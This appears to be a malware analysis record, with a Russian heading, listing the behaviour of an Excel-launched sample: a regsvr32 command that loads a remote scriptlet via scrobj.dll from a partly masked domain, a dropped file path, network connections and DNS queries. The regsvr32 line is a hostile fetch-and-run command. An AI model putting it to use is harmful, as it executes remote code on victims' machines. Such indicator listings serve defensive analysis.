Техническая информация
- '<SYSTEM32>\regsvr32.exe' /svYroCycvdeIGrUoOzdIzRcU /ndXLTTCSRSfuYKeIkbHuoaGe /uvYroCycvdeIGrUoOzdIzRcU /i:https://www.4s##c.com/web/directDownload/mnYfmkmM/q_9jfdwS.ae2acc0a1a93574c512a5f32336c8aff scrobj.dll UXa...
- %HOMEPATH%\application data\microsoft\forms\refedit.exd
- '4s##c.com':443
- 'cr#.#odaddy.com':80
- 'oc##.#tartssl.com':80
- 'oc##.thawte.com':80
- http://cr#.#odaddy.com/gdroot-g2.crl
- http://cr#.#odaddy.com/gdig2s1-1922.crl
- DNS ASK 4s##c.com
- DNS ASK cr#.#odaddy.com
- DNS ASK st####.rapidssl.com
- DNS ASK oc##.#tartssl.com
- DNS ASK oc##.thawte.com
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding